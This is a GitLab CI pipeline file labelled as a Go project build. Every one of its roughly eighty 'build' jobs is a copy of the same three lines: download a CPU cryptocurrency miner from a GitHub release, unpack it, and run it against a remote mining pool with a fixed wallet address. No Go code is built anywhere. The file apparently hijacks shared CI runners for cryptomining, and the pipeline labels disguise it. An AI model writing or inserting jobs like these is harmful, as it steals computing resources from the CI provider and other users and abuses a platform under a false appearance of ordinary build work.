image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_b:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_c:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_d:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_e:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_f:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_g:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_h:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_i:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_j:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_k:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_l:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_m:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_n:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_o:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_p:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_q:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_r:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_s:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_t:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_u:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_v:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_w:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_x:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_y:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_z:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ab:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ac:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ad:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ae:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_af:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ag:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ah:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ai:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_aj:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ak:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_al:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_am:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_an:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ao:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_av:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_aw:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ax:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_ay:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_az:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_aaa:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_aab:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_aac:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_aad:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_aae:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_1:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_2:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_3:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_4:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_6:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_7:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_8:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_9:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_10:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_11:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_12:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_13:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_14:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_15:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_16:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_17:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_18:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_19:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_20:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_21:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_22:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_23:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_24:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS

build_25:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.GASTEROS
